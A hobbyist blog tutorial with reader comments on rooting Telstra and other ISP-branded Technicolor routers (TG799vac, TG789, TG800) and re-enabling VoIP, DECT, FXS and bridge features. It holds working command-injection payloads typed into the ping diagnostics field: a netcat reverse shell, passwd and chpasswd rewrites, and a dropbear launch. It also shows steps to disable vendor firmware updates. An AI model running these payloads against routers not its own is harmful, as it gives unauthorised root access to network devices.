Hacking the Technicolor TG799vac (and unlocking features!)

The TG799vac, known more commonly in Australia as the “Telstra Gateway Max” is a very capable piece of equipment. It has 802.11ac, a VDSL / ADSL2 modem (meaning NBN FTTN compatibility), a DECT base station, 2 x FXS ports for analogue ports, and an FXO port.

They are provided directly to Telstra – and as such, has Telstra branded firmware. There is no ‘generic’ firmware available that will just give you access to the modem as any other device you would purchase. Personally, I think this kind of sucks – as if you decide to use this device with anyone other than Telstra, you lose access to the VoIP functionality, DECT base station, FXO ports. That was the motivation to crack into this device and re-enable as many features as possible.

By default, the IP address of the modem will be In this example, I use a desktop on

First, we have to exploit the web interface to get root access to the device. This can be done by a flaw in IPv6 address validation on the web site – which will allow the web server to run arbitrary code. This is good – otherwise none of the rest would be possible.

Getting root access

On your desktop, we want to open a listening port. Ensure that your firewall will allow this though.
# nc -lvvp 10001

Now visit the ‘Diagnostics’ page on the modem, and click on the Ping & Traceroute tab. In the IP address section, enter:
:::::::;nc 10001 -e /bin/sh

If your modem doesn’t display the Diagnostics tile, you can use firebug or something similar (F12 in Internet Explorer) inspect the DOM of the main page of the modem GUI with all the “tiles” on it and change one of the existing “tiles” in the GUI (such as “Management”)

<div class="settings" id="Management" data-remote="modals/usermgr-modal.lp" data-toggle="modal" data-id="usermgr-modal"></div>

<div class="settings" id="Diagnostics" data-remote="modals/diagnostics-xdsl-modal.lp" data-toggle="modal" data-id="diagnostics-xdsl-modal"></div>

Exit the DOM inspector and click on the “Management” tile as if you were entering the Management page. It should load the Diag page instead.

If all goes well, your modem will now connect to your desktop – and make available a root shell for you. NOTE: At this point, you won’t see any type of shell prompt, or error messages – so while you’ll get output of commands, it can get a little confusing.

First steps – change the root password, get dropbear (the SSH server) to run on boot – NOTE the lack of prompt:

Changing password for root
New password:
Retype password:
Password for root changed by root
echo 'dropbear &' > /etc/rc.local

You should now be able to SSH into your modem on on the LAN IP with the username root and password you set above.

$ ssh root@
root@'s password:
BusyBox v1.23.2 (2017-02-08 14:47:26 UTC) built-in shell (ash)
  _______              __           __              __
 |_     _|.-----.----.|  |--.-----.|__|.----.-----.|  |.-----.----.
   |   |  |  -__|  __||     |     ||  ||  __|  _  ||  ||  _  |   _|
   |___|  |_____|____||__|__|__|__||__||____|_____||__||_____|__|
                 N E X T   G E N E R A T I O N   G A T E W A Y
  * 1 oz Vodka          Pour all ingredients into mixing
  * 1 oz Triple Sec     tin with ice, strain into glass.
  * 1 oz Orange juice
Product: vant-f_telstra
Release: Aqua (16.3)
Version: 16.3.7567-2521030-20170614084458-887a8c777ed8527277d7137ed9149816c889cf1d
Hash config:         887a8c777ed8527277d7137ed9149816c889cf1d
Hash openwrt:        ca2463af2522fc727150f23d6e85005112e8e8eb
Hash kernel:         b295f29cce441d87cef07373bfb07b546f720db3
Hash technicolor:    021884ac6200cd08635043046d33a717336a3554
Hash mindspeed:      91b6a7a4d703268d6023c3a58da3d33fc62e7ed8
Hash lte:            cf5c1319d7769c1b9e7721dfebcfe25e8cc1176f
Hash routing:        7b853f235ce96cd14f3abaebf9253c5ca7f72f7d
Hash custo:          85da3def73fee4e92f478d2b1afafdfc16235a81
Hash packages:       0f8aa1264d7a3bf6e4304f0f8ddfdabc4ddac7e4
Bootloader: 2.0.54

You’ll note straight away that the firmware is based on OpenWRT. This is always good – as it means that the majority of the OpenWRT configuration is applicable directly to this modem.

Disable software updates

A reader has written to advise that the exploit we have used to get access to the modem is fixed in release 17.1. To prevent your modem from auto-upgrading, I suggest commenting out the following lines in /etc/config/cwmpd as follows:

option upgradesmanaged '0'
#option acs_url 'https://xxxxxxxxxx'

I also recommend disabling the service:

# /etc/init.d/cwmpd stop
# /etc/init.d/cwmpd disable
# /etc/init.d/cwmpdboot disable

Using bridge mode with dedicated PPPoE ethernet port

I use the AP on the device on my LAN – but I also use the modem purely in bridge mode – which means I want to dedicate a port to my router to allow it to do PPPoE to my ISP. Thankfully – standard OpenWRT config applies. I added a new bridge called ‘adsl_wan’ and added eth4, eth3, atm_8_35 and ptm0 to it:

config interface 'adsl_wan'
        option type 'bridge'
        option ip6hint '0'
        option force_link '0'
        list ifname 'eth4'
        list ifname 'eth3'
        list ifname 'atm_8_35'
        list ifname 'ptm0'

You’ll need to remove eth3 from the LAN vlan. This gives you the port right next to the WAN ethernet (which is eth3 – eth4 is the WAN port) on the same bridge as the VDSL/ADSL modem. I have yet to figure out how to get the WAN port to do this – as it seems to be configured differently – maybe at the switch level.

Enable web interface features

If you have the modem in bridge mode, the web interface is gutted compared to in routed mode.

Edit /www/lua/cards_limiter.lua and change the following function to:

function M.card_limited(info, cardname)
  ## Display all cards.
  return false

  if info.bridged then
    return not bridge_limit_list[cardname]
  return false

Restart the web interface via: /etc/init.d/nginx restart

Configure a third party SIP provider

Edit /etc/config/mmpbxrvsipnet and use the following guide:

Under the heading sip_net, set:

  • primary_registrar to your SIP server – ie my.sipserver.com
  • primary_registrar_port to 5060
  • primary_proxy to your SIP server – ie my.sipserver.com
  • primary_proxy_port to 5060
  • Under the heading sip_profile_0, set:

  • user_name – your SIP username
  • uri – your SIP username
  • password – your SIP password
  • enabled – set to 1
  • Restart the mmpbxd service via /etc/init.d/mmpbxd restart

    If you have multiple SIP accounts to log into – and with different providers, you can duplicate the entire sip_net section under a different name and configure as per above. Set the profile network setting to point to the new section you have created.

    Enable the FXS ports

    To enable the FXS ports, set the relay_state parameter to ‘1’ in /etc/config/mmpbxbrcmfxsdev – eg for FXS port 2:

    config device 'fxs_dev_0'
            option user_friendly_name 'Phone 1'
            option comfort_noise 'silence'
            option echo_cancellation '1'
            option fax_transport 'inband_renegotiation'
            option t38_redundancy '1'
            option rtcp_interval '5000'
            #list codec_black_list 'G722'
            #list codec_black_list 'AMR-WB'
            option cw_cas_delay '758'
            option fxs_privacy_reason 'P'
            option fxs_unavailability_reason 'O'
            option fxs_port '2'
            option cid_display_date_enabled '1'
            option cid_display_calling_line_enabled '1'
            option cid_display_calling_party_name_enabled '1'
            option pos '0'
            option early_detect_faxmodem '0'
            option relay_state '1'

    SIP call routing

    Each DECT device or FXS port can be registered against one or multiple SIP accounts. Look for the incoming_map section against sip_profile_0 and edit as needed. This is my setup to route sip_profile_1 to the first registered DECT device – and FXS port 1:

    config incoming_map
            option profile 'sip_profile_0'
            list device 'fxs_dev_0'
            list device 'dect_dev_1'
            list device 'dect_dev_2'
            list device 'dect_dev_3'
            list device 'dect_dev_4'
            list device 'dect_dev_5'
            list device 'sip_dev_0'
            list device 'sip_dev_1'
            list device 'sip_dev_2'
            list device 'sip_dev_3'
            list device 'sip_dev_4'
            list device 'sip_dev_5'
            list device 'sip_dev_6'
    config incoming_map
            option profile 'sip_profile_1'
            list device 'dect_dev_0'
            list device 'fxs_dev_1'

    Registering DECT handsets

    After enabling all the ‘cards’ via the web interface, the easy way is to start DECT paring via the web interface. Click on the Telephony card, then ‘Start’ the paring and follow the instructions for your handset. This was straight forward for me.

    Speeding up sync times

    If you are on an NBN FTTN connection, it seems the modem still tries to sync using ADSL first. The default NBN FTTN profile is 17a – so we can disable other modes in /etc/config/xdsl:

    config xdsl 'dsl0'
            #list multimode 'gdmt'
            #list multimode 'adsl2annexm'
            #list multimode 'adsl2plus'
            list multimode 'vdsl2'
            #list profile '8a'
            #list profile '8b'
            #list profile '8c'
            #list profile '8d'
            #list profile '12a'
            #list profile '12b'
            list profile '17a'
            option enabled '1'
            option eoc_vendor_id 'BETMMB'
            option handshake_switch_timeout '0'
            option demod_cap_value '0x90447a'
            option demod_cap_mask '0x90447a'
            option demod_cap2_value '0x790000'
            option demod_cap2_mask '0x790000'
            option aux_features_value '0x1064003'
            option aux_features_mask '0x1064003'
            option vdsl_cfg_flags_value '0x1200e00'
            option vdsl_cfg_flags_mask '0x1200000'
            option xdsl_cfg1_value '0x0'
            option xdsl_cfg1_mask '0x0'
            option xdsl_cfg2_value '0x0'
            option xdsl_cfg2_mask '0x0'
            option maxaggrdatarate '160000'
            option maxdsdatarate '110000'
            option maxusdatarate '40000'
            option eoc_serial_number 'YeahRight 799vac 16.3'

    Changing max sync speeds

    In /etc/config/xdsl, you can change the max values for sync speeds. The value maxusdatarate controls the upstream maximum sync speed, maxdsdatarate controls the downstream maximum sync speed, and maxaggrdatarate is the maximum combined speed. The defaults are listed above. This doesn’t change any limitations imposed by line length – or at the DSLAM.

    Serial Console

    A serial console can be added using a 3.3v to RS232 adapter. These can be found on ebay quite cheaply. The serial console is J5 on the board, and note from the picture below, R327 and R328 need to be solder bridged to pass the serial signals to the adaptor. In the pictures shown, Black = Ground, Yellow = RX, and Green = TX.

    Update history

    2017-09-02 – Initial revision of this document.
    2017-09-07 – Add section to disable cwmpd to prevent pushed firmware updates locking us out.
    2017-10-20 – Add workaround for diagnostics tile thanks to NetSicK
    2017-11-20 – Add serial console details thanks to Matt.


    Skip to comment form

      • TeddyRaspin on September 4, 2017 at 5:22 pm
      • Reply

      Do you know how disabling this hack and turn back modem to its default status please ?

      1. A standard factory reset should restore everything.

        While the changes survive a reboot, they should not survive the factory reset.

      • TeddyRaspin on September 5, 2017 at 1:54 am
      • Reply

      Anyway on DGA4130 (Technicolor AGTEF) SSH is enabled but using WinSCP or Putty I always get “access denied”. It seems that even if it says “password for root changed by root” and enabled the dropbear (ssh server) via the echo ‘dropbear &’ > /etc/rc.local command, after the reboot process SSH is enabled but it seems to not accepting the root password I’ve inserted before and I don’t know why.

      Maybe my Technicolor modem requires more hacking tweaks. Could you help me please ?

      1. You might need to edit the file /etc/config/dropbear and allow it to use password auth.

        Mine looks like:

        config dropbear
                option enable '1'
                option PasswordAuth 'on'
                option RootPasswordAuth 'on'
                option Port         '22'
                option IdleTimeout '600'
        #       option BannerFile   '/etc/banner'
          • Dale on October 5, 2017 at 3:53 pm
          • Reply

          Also works on TG797n v3 (16.1), but instead of:
          echo ‘dropbear &’ > /etc/rc.local

          To enable dropbear I had to edit the file /etc/config/dropbear, thank you.
          To do that I used the sed command to edit line 2, and then lines 3 & 4:
          sed -i '2 s/0/1/' /etc/config/dropbear
          sed -i '3,4 s/off/on/g' /etc/config/dropbear
          cat /etc/config/dropbear

      • Brian on September 7, 2017 at 10:37 pm
      • Reply

      Thanks for this….., Pity they fixed the exploit in the web pages in 17.1 but it seems I got to mine before any push happened.

      Stopped and disabled the update service, but it reappeared after reboot, so i mashed out the update URL with hashes like suggested
      #option acs_url ‘https://################################’

      1. I’m not sure there are any Telstra type modems with 17.1 firmware as yet. Of course, other countries may have a different story…

        • Greg on October 7, 2017 at 10:57 am
        • Reply

        The exploit comes from weaponizedautism.wordpress.com. He said he’d release more unlocking techniques if Technicolor fixes this one. Maybe leave a comment there somehow. I can’t find anywhere to comment.

    1. Can I also add just for the sake of the search engines that most of this also applies to the iinet / internode issued TG–789 VDSL modems?

      Can I also note that on the TG-789 at least that you can enable dropbear ssh by editing the /etc/config/dropbear file instead of adding to the /etc/rc.local file.

      *** dropbear.orig 2017-09-08 09:40:16.532696000 +1000
      — dropbear 2017-09-08 09:41:10.828503662 +1000
      *** 1,7 ****
      config dropbear
      ! option enable ‘0’
      ! option PasswordAuth ‘off’
      ! option RootPasswordAuth ‘off’
      option Port ’22’
      # option BannerFile ‘/etc/banner’
      option IdleTimeout ‘600’
      — 1,7 —-
      config dropbear
      ! option enable ‘1’
      ! option PasswordAuth ‘on’
      ! option RootPasswordAuth ‘on’
      option Port ’22’
      # option BannerFile ‘/etc/banner’
      option IdleTimeout ‘600’

        • LucIta on December 3, 2017 at 8:11 am
        • Reply

        In addition to llllloooooo instructions for TG–789 for the italian provider Tiscali to have ssh root login working you also need to modify the line referring to root user in /etc/passwd
        Otherwise you can’t authenticate after enabling ssh and changing root password

      • TeddyRaspin on September 10, 2017 at 7:58 pm
      • Reply

      It would be nice if someone finds out a new exploit on 17.1 to enable root access. I’ve now my modem fixed. 🙁

      • TeddyRaspin on September 15, 2017 at 9:03 pm
      • Reply

      Is there anyone who knows how switch from bank_2 to bank_1 ?

      My modem does not have telnet or ssh access. 🙁

        • MrMatthewM on October 9, 2017 at 12:11 am
        • Reply

        If you do a factory reset it may switch back to bank_1, a failsafe for a failed firmware update.

        I have not exactly confirmed this as 100% but I was watching the console after the update from 15.1 to 16.3 it had upgraded but I had lost access to the web interface (I got Internal server error) this may of been a failed firmware update but watching the console it was booting, so I held down the reset button for 10 seconds and after reboot it booted from bank_1 again and redid the firmware update to 16.3.

      • John Doe on September 25, 2017 at 9:25 pm
      • Reply

      It works also on TG789VAC V2 (16.3).

      /etc/shadow and /etc/config/dropbear changes survives in case of fw upgrade through CWMP or file is overwritten?

      1. I believe they would get over-written.

      • Brian on September 29, 2017 at 10:38 am
      • Reply

      Anyone know if this works on TG800VAC ?

      I can get the executed code to open a shell (Its saying connected), but its immediately dropping back to the Host prompt, not staying connected (i think). Any chance the TG800 is immediately dropping the session ?

        • Darren on September 29, 2017 at 11:13 pm
        • Reply

        I was able to perform the exploit on my TG800 no different from my TG799.

      • notmyname on September 29, 2017 at 4:04 pm
      • Reply

      the netcat connection didnt work for me.
      these steps did work for me:
      1. use this: :::::::;echo 'dropbear &' > /etc/rc.local to enable ssh through traceroute
      2. ssh root@
      3. (the hard part) had to brute force the password (jks, the password is root)

        • Frank on September 30, 2017 at 1:31 pm
        • Reply

        Excuse my ignorance, but not that savvy with these things. Downloaded netcat and couldn’t get to work. Any chance of expanding on the steps and simplifying in plain simple terms of what you actually did?

        • MrMatthewM on October 2, 2017 at 4:49 pm
        • Reply

        What firmware are you running? still 16.3 or 17.1

        I have been wondering if it would be possible for routers that have been upgraded to 17.1 Is to do a hard reset so the modem switches back to bank 1 then log in via ssh manually switch to bank 2 enable ssh on the 17.1 file system then switch back.

      • Chipsteroo on October 7, 2017 at 12:30 pm
      • Reply

      I had no luck with nc, because on 14.1 the nc command doesn’t support the -e option

      I ended up getting shell access using

      :::::::;dropbear &
      :::::::;echo ‘root:x’ | chpasswd

      Then ssh into router as root with password = x

      • matt on October 7, 2017 at 7:20 pm
      • Reply

      A couple of notes from my recent attempts to do this:

      On a Mac running OS X 10.10 (Yosemite), the command to get netcat to listen is:

      /usr/bin/nc -l 10001

      Also might be worth noting that editing once logged into the modem requires the vi command (and knowing how to use vi) which isn’t explicitly stated in the tutorial above – eg:

      vi /www/lua/cards_limiter.lua

      My modem is still running v15.3 firmware – which greets you at the remote login with warnings about being prerelease and not for deployment. The change to enable all the cards in bridged mode locks you out of the web admin – the password is no longer accepted. sshing back in and commenting out removing that first added “return false” line returns the ability to log in.

      I’m not sure how much info Bridged Mode removed in later firmware, but on 15.3 it appears to be a fairly complete Advanced Settings version (with no simple mode option) – obviously a number of services are disabled, but going back to Routed Mode requires a factory reset, which I assume will wipe all the changes made?

      • Bogemon on October 26, 2017 at 11:12 am
      • Reply

      hello guys

      Just want to check if anyone found anything on doing this on 17.1. Looks like the ping box wont allow me to send it. gives a validation error now. . Any other way to do this?

      • Thisavros on October 29, 2017 at 1:04 pm
      • Reply

      Tks. ssh access worked for me.
      Got the FXS port up with continuous dial tone
      Entered the sip_profile details and maps but when attempting a call it fails after second digit.
      I note in the logs
      Sun Oct 29 11:48:10 2017 user.debug mmpbxd[7155]: [MMUCI] :E: mmUciCommonAllocateContext:248 – Error loading the UCI config from file for mmpbxbrcmsi3217x: UCI_ERR_NOTFOUND
      Sun Oct 29 11:48:10 2017 user.debug mmpbxd[7155]: [MMBRCM] :E: mmBrcmSi3217xConfigLoad:1872 – No Slic configuration is found. Endpoint Driver default config will be used.
      Sun Oct 29 11:48:10 2017 user.debug mmpbxd[7155]: [MMBRCM] :E: mmBrcmInit:590 – mmBrcmSi3217xConfigLoad has failed: MMPBX_ERROR_NOCONFIG

      Have I missed a config file?

        • Thisavros on November 2, 2017 at 11:41 pm
        • Reply

        Hey guys figured it out with some help from the AusiieBB help desk.
        After successfully root kit the router TG800vac Build 16.3.7567-660-RD
        I followed the above guide. Exception being that silly me used the IP address for the proxy & registrar

        After using the “case” sensitive fqdn: eg:
        Proxy Server: AussieBB.nms1.voice.wide.net.au
        Registrar Server: AussieBB.nms1.voice.wide.net.au
        Outbound Proxy: AussieBB.nms1.voice.wide.net.au
        Port: 5060
        VoIP is up and running.

        There are still many errors in the logs but I can make & receive calls.

        Thank you to CRCinAU

      • Sacha Weatherstone on October 30, 2017 at 6:27 pm
      • Reply

      I have the technicolor tg789vac v2 HP running firmware v16.3 (myRyrepublic) I have confirmed that the Ping RCE exploit still works (:::::::`halt` halts the system), The router also has ssh enabled by default but the password is unknown, but the main issue I am having is that I cannot get netcat working, I have confirmed the modem can ping my host but no netcat connection can ever be established, any ideas?

        • Sacha Weatherstone on November 8, 2017 at 7:57 am
        • Reply

        anyone got any ideas?

          • Geoff on December 5, 2017 at 9:28 pm
          • Reply

          I used MobaXterm on Win10 as it has nc command built in.
          Start a local terminal.
          nc -l 10001
          then in your modem do the ping and traceroute
          You wont see anything in MobaXterm but you can continue with the passwd change.
          I couldn’t get anything else to work but once I got MobaXterm and realised I wouldn’t see any responce it was easy.

      • Johnny on November 3, 2017 at 4:00 pm
      • Reply

      Does anyone know how to disable Telstra air. Can’t seem to find any mention of it throughout the router directories.

        • Johnny on November 3, 2017 at 4:22 pm
        • Reply

        /etc/init.d/hotspotd stop

    2. Hi I’m not that strong in router configuration. But I got my ssh running and all is well.

      I want my TG799vac just to be a modem, nothing else, I have a unifi USG gateway that will take care of all routing, firewall etc. but how do you get it in Bridge mode ? I made the adsl_wan as described but it doesn’t seem to take effect, in I missing something here 🙂

      • Will on November 5, 2017 at 10:36 pm
      • Reply

      I have managed to applied the hack.

      I am running the modem in Bridged mode. How can i allow the traffic on the modem connect to internet for the SIP/LAN/etc?

      • Jatz on November 7, 2017 at 1:56 pm
      • Reply

      If you apply this hack and setup a custom voip provider, can you use the Telstra t-voice 502 handset with the non-telstra voip?

      1. From what I understand, this is just a normal DECT phone – so it should work.

      • Jens TC on November 13, 2017 at 12:21 am
      • Reply

      Is it possible to install and use OpenVPN on the Technicolor. Release: Jade (16.2) ?

      • SwiftCookie on November 21, 2017 at 11:48 pm
      • Reply

      Yo, firstly does this still work? 🙂

      Secondly if it does, will this allow me to get any improvements out of my line with the sync speed fixes?
      So sick of the Telstra controlled modem but I need it to use Voip :/

      Been using a NetDuma R1 for gaming purposes, but it’s just running off the Technicolor via Ethernet.


      • theDarkPotato on November 22, 2017 at 7:19 pm
      • Reply

      My router is updated to 17.2 It is fixed

      • Oldtimer on November 26, 2017 at 9:01 am
      • Reply

      I have 15.4 and would like to get 16.3, but obviously i dont want to get 17+. Is there any way to accept the update and just store the firmware without actually updating so that i can update manually if i choose to do so?

        • geoff on November 28, 2017 at 7:26 pm
        • Reply

        You can download 16.3 from 16.3.7567-660-RG (TG799) size 20.81 MB

        Jailbreak Telstra TG799
        ssh into Telstra TG799
        scp the download 16.3 rbi file to /tmp/
        Run the command “sysupgrade -v /tmp/filename-of-downloaded-sysupgrade.rbi”
        Telstra TG799 will update and then reboot itself
        Jailbreak Telstra TG799 (required again after firmware update)
        lock Telstra TG799 down to prevent cwmpd updating to 17.x

          • Oldtimer on November 29, 2017 at 10:33 pm
          • Reply

          Thanks Geoff, but i dont have Vant-F i have Vant-W, is it still safe to do the firmware upgrade?

      • execcr on November 28, 2017 at 6:46 pm
      • Reply

      Could we have another exploit for the 17.2 firmware?

      • Vlad on November 29, 2017 at 2:57 pm
      • Reply

      Hi There,

      now that I have ssh access and all the above mods were done.

      Does anyone know how I can install net-snmp on the technicolor tg800?

      • ciciusx on December 1, 2017 at 9:30 am
      • Reply

      Hi how can I make wan port in Lan port? I have 789vac unlocked

      1. I haven’t found a way to do this as yet.

      • ciciusx on December 1, 2017 at 5:36 pm
      • Reply

      and to make personal password to enter in remote on modem?
      and to put USA instead eu for wifi 2,4Ghz?

      • niko on December 5, 2017 at 6:05 am
      • Reply

      Could anyone post the contents of the keys in /proc/keys for this router?
      To do so just run the following command from the root shell:

      find /proc/keys -type f -exec sh -c ‘echo $0: $(cat $0)’ {} \;

      • Geoff on December 5, 2017 at 9:33 pm
      • Reply

      Excellent Post thanks. I was able to SSH into my TG789vac v2 Firm ware 16.3.
      When I SSHed in my splash screen had a big red warning on it saying
      “Demo build, unofficial Technicolor SW, not suitable for deployment!”
      Not sure whether to laugh or be worried. 8-(

      I also closed port 3005 which was open with this command:
      iptables -D zone_wan_input -p tcp -m tcp –dport 30005 -m comment –comment Allow_CWMP_Conn_Reqs -j ACCEPT

      Thanks again

      • Dennis on December 6, 2017 at 7:30 pm
      • Reply

      For TG797n V3 (V15.1), got it to work using a variant of a previous post:-
      :::::::;dropbear & echo ‘root:x’ | chpasswd

      Then, ssh root@ using password x.
      Then, i changed root password using ‘passwd’.


      • Dennis on December 11, 2017 at 5:14 pm
      • Reply

      From previous tests before, i remember that PPPoE is only allowed on the ADSL port…
      Anyone try or have it working to get PPPoE on the WAN port?


        • Dennis on December 15, 2017 at 10:15 am
        • Reply

        Answering my own question….
        File : /etc/config/network
        Change: interface ‘wan’ from option proto ‘dhcp’ to ‘pppoe’

        config interface ‘wan’
        option proto ‘dhcp’
        config interface ‘wan’
        option proto ‘pppoe’

          • Dennis on December 15, 2017 at 1:18 pm
          • Reply

          One other thing to do:-
          Need to disable wansensing…. wansensing changes the “wan” interface back to DHCP after link down/up…

          config wansensing ‘global’
          option enable ‘0’ <——- '1' to '0'
          option autofailover 'readonly'
          option initmode 'L2Sense'
          option l2type 'ETH'
          option l3type 'L3Sense'

      • Wayne on December 15, 2017 at 8:22 am
      • Reply

      Anyone successfully done a MyRepublic TG789 ?

      I can do the iinet/Internode TG789 with my eyes closed and hands tied behind my back but the MyRepublic branded one is giving me the s…s!

        • Nicholas on December 22, 2017 at 6:01 pm
        • Reply

        No idea but I would also really appreciate to know. It seems the exploit still works on the installed firmware version (managed to send a message though), however I couldn’t get the root shell over netcat to work no matter what I tried…

          • Wayne on December 24, 2017 at 5:56 am
          • Reply

          The root shell never opens on the MyRepublic one it does on the iinet/Internode one so I know my software is no the issue. They only difference I can see is that the iinet ones run VANT-6 firmware and the MyRepublic ones run VBNT-L although pull both apart and the boards are identical with all the same chips. I have even tried TFTPD to flash the VANT-6 firmware onto the MyRepublic one and it will not take. Keep on trying different things eventually it will tumble.

      • Paul Smedley on December 26, 2017 at 8:37 am
      • Reply

      Hi All – anyone been successful adding a 2nd SIP provider? Everytime I try it here, mmpbxd fails to restart. Would love a copy of someones mmpbxrvsipnet (with passwords hashed out) to try and use here

      • Daniel on December 26, 2017 at 1:56 pm
      • Reply

      This is an amazing tutorial. I’m running the older Technicolor TG797n v3 which is just a standard old ADSL modem. Do you, or anyone else know of any guides to unlock this modem? The current feature set is trash.


      • gja on January 5, 2018 at 8:41 pm
      • Reply

      Extra trivia for anyone doing this to an Internode-supplied TG789vac v2 modem running v16.3 and following the steps above for disabling cwmpd.

      There’s a watchdog daemon keeping an eye on cwmpd, which reboots the modem some tens of seconds after the cwmpd process is initially killed with “/etc/init.d/cwmpd stop”. (See see /etc/config/watchdog.)

      So be prompt with the additional “/etc/init.d/cwmpd disable” and “/etc/init.d/cwmpdboot disable” steps and cwmpd will not come back up after the reboot. (The watchdog wont subsequently complain about cwmpd never coming up, it only cares if cwmpd starts and then goes away.) But it can be a little unnerving having the ssh connection die for no apparent reason after stopping cwmpd 😉

      Probably better to do the two disable steps first, then stop the running cwmpd. Wait a minute for the reboot to happen, then log back in and continue your merry hacking…

    3. hello,
      on firmware 17.1 there is a possible exploit with the domain field of the dydns tile.

      • Mark on January 10, 2018 at 10:28 pm
      • Reply

      Has anyone had any luck with the myrepublic version TG789vac v2. I feel as though this is excellent hardware that can do so much more if it could only be unlocked.

      • Mark on January 10, 2018 at 10:34 pm
      • Reply

      Could someone please post the path of USB mounted drive. I’d like to try to run a few scripts from a USB stick using the exploit to try and add a user to ssh.


      • Wayne on January 13, 2018 at 12:53 pm
      • Reply

      The guys on Whirlpool worked out how to do the MyRepublic TG789vac
      So this is none of my work so don’t thank me goto Whirlpool and thank them but I have confirmed it works and it does not survive a factory reset but does survive a on/off reset.

      Ping this first after you change what password you want (all on one line)
      :::::::;sed -i ‘s#root:/bin/false#root:/bin/ash#’ /etc/passwd;echo “root:yourpasswordhere”|chpasswd;dropbear -p 6666 &

      login into port 6666 via ssh and edit the following file (WinSCP under windows with SCP protocol works great to do this)
      option RootLogin ‘0’
      option RootLogin ‘1’

      save & exit and restart the router then login to port 22 like normal

      • Joe on January 14, 2018 at 6:55 pm
      • Reply

      I have a MyRepublic TG789vac

      When I enter into the IP address for the ping = :::::::;sed -i ‘s#root:/bin/false#root:/bin/ash#’ /etc/passwd;echo “root:yourpasswordhere”|chpasswd;dropbear -p 6666 &

      and change my password in the above text for this example to “test”
      After I SSH to port 6666 I get a reply ” login as” which I input “root”
      and then I type the password “test” as for my example

      It will not recognize the password

      Have disabled my firewall fully to allow port 1001 thru .
      Do I need to have Ipv6 state turned on in my Router . I have it turned off because My republic does not use Ipv6. I turned Ipv6 back on and made no difference.

      I can can SSH to the router but it wont recognize the password for root

      What am I doing wrong ?

      • Wayne on January 15, 2018 at 5:40 am
      • Reply

      Not sure but I reset mine to factory defaults before I started to get rid of any changes I had made and did not have a problem. make sure you have root:test.
      :::::::;sed -i ‘s#root:/bin/false#root:/bin/ash#’ /etc/passwd;echo “root:test”|chpasswd;dropbear -p 6666 &

      • Joe on January 16, 2018 at 3:57 pm
      • Reply

      Thanks Wayne , I tried cutting and pasting your line just in case I made a typo in my previous attempts but I am still getting the same results where I get the logon prompt which I input “root” and then I enter the password “test” but it still comes up with the message “ACCESS DENIED” and gives me the prompt to re-enter the password again.
      I will try your tip and reset back to factory results and see if that makes any difference .

      • Joe on January 16, 2018 at 5:01 pm
      • Reply

      Ok , I just did a Factory Reset and it still does not work.
      Will keep trying

        • Wayne on January 17, 2018 at 7:28 am
        • Reply

        What version is your bios? If it has been updated it won’t work

      • Joe on January 17, 2018 at 1:16 pm
      • Reply

      Full Stats on the model I’m trying to upgrade are :

      MediaAccess TG789MYRvac v2 HP
      Software Version = 16.3
      Firmware Version = 16.3.7190-2761005-20161004084353
      Firmware OID = 57f34fa94f5105213973abd5
      Bootloader Version = 2.0.89
      Bootloader OID = unknown
      Hardware Version = VBNT-L
      Serial Number = CP1714VAE7H

    Leave a Reply

    Your email address will not be published.